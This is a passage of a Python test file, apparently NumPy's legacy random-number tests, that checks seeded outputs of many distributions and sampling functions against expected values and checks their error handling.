assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_int64_uint64_corner_case(self):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int, np.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, 'dtype'))
assert_equal(type(sample), dt)
class TestRandomDist(object):
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
random.seed(self.seed)
actual = random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rand_singleton(self):
random.seed(self.seed)
actual = random.rand()
desired = 0.61879477158567997
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
random.seed(self.seed)
actual = random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
random.seed(self.seed)
actual = random.randn()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_randint(self):
random.seed(self.seed)
actual = random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(198, size=(3, 2))
assert_(len(w) == 1)
assert_array_equal(actual, desired + 100)
def test_tomaxint(self):
random.seed(self.seed)
rs = random.RandomState(self.seed)
actual = rs.tomaxint(size=(3, 2))
if np.iinfo(np.int).max == 2147483647:
desired = np.array([[1328851649, 731237375],
[1270502067, 320041495],
[1908433478, 499156889]], dtype=np.int64)
else:
desired = np.array([[5707374374421908479, 5456764827585442327],
[8196659375100692377, 8224063923314595285],
[4220315081820346526, 7177518203184491332]],
dtype=np.int64)
assert_equal(actual, desired)
rs.seed(self.seed)
actual = rs.tomaxint()
assert_equal(actual, desired[0, 0])
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
typer = np.dtype('l').type
actual = random.random_integers(typer(np.iinfo('l').max),
typer(np.iinfo('l').max))
assert_(len(w) == 1)
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
random.seed(self.seed)
actual = random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
random.seed(self.seed)
actual = random.random_sample()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_choice_uniform_replace(self):
random.seed(self.seed)
actual = random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random.seed(self.seed)
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random.seed(self.seed)
actual = random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random.seed(self.seed)
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random.seed(self.seed)
actual = random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.randint(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.randint(0, -10, size=0).shape, (0,))
assert_equal(random.randint(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_p_non_contiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random.seed(self.seed)
non_contig = random.choice(5, 3, p=p[::2])
random.seed(self.seed)
contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(non_contig, contig)
def test_bytes(self):
random.seed(self.seed)
actual = random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_permutation(self):
random.seed(self.seed)
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [0, 1, 9, 6, 2, 4, 5, 8, 7, 3]
assert_array_equal(actual, desired)
random.seed(self.seed)
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
random.seed(self.seed)
bad_x_str = "abcd"
assert_raises(IndexError, random.permutation, bad_x_str)
random.seed(self.seed)
bad_x_float = 1.2
assert_raises(IndexError, random.permutation, bad_x_float)
integer_val = 10
desired = [9, 0, 8, 5, 1, 3, 4, 7, 6, 2]
random.seed(self.seed)
actual = random.permutation(integer_val)
assert_array_equal(actual, desired)
def test_beta(self):
random.seed(self.seed)
actual = random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random.seed(self.seed)
actual = random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
random.seed(self.seed)
actual = random.binomial(100.123, .456)
desired = 37
assert_array_equal(actual, desired)
def test_chisquare(self):
random.seed(self.seed)
actual = random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
def test_dirichlet_alpha_non_contiguous(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random.seed(self.seed)
non_contig = random.dirichlet(alpha, size=(3, 2))
random.seed(self.seed)
contig = random.dirichlet(np.ascontiguousarray(alpha),
size=(3, 2))
assert_array_almost_equal(non_contig, contig)
def test_exponential(self):
random.seed(self.seed)
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.)
def test_f(self):
random.seed(self.seed)
actual = random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random.seed(self.seed)
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
random.seed(self.seed)
actual = random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random.seed(self.seed)
actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.)
def test_hypergeometric(self):
random.seed(self.seed)
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random.seed(self.seed)
actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.)
def test_logistic(self):
random.seed(self.seed)
actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random.seed(self.seed)
actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.)
def test_logseries(self):
random.seed(self.seed)
actual = random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random.seed(self.seed)
actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='other')
assert_raises(ValueError, random.multivariate_normal,
np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal,
mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal,
mu, np.eye(3))
def test_negative_binomial(self):
random.seed(self.seed)
actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100,
[np.nan] * 10)
def test_noncentral_chisquare(self):
random.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
random.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random.seed(self.seed)
actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.)
def test_pareto(self):
random.seed(self.seed)
actual = random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random.seed(self.seed)
actual = random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random.seed(self.seed)
actual = random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random.seed(self.seed)
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
random.seed(self.seed)
actual = random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random.seed(self.seed)
actual = random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
random.seed(self.seed)
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
random.seed(self.seed)
actual = random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn_singleton(self):
random.seed(self.seed)
actual = random.randn()
desired = np.array(1.34016345771863121)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
random.seed(self.seed)
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random.seed(self.seed)
actual = random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random.seed(self.seed)
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random.seed(self.seed)
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random.seed(self.seed)
r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random.seed(self.seed)
r = random.vonmises(mu=0., kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random.seed(self.seed)
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random.seed(self.seed)
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random.seed(self.seed)
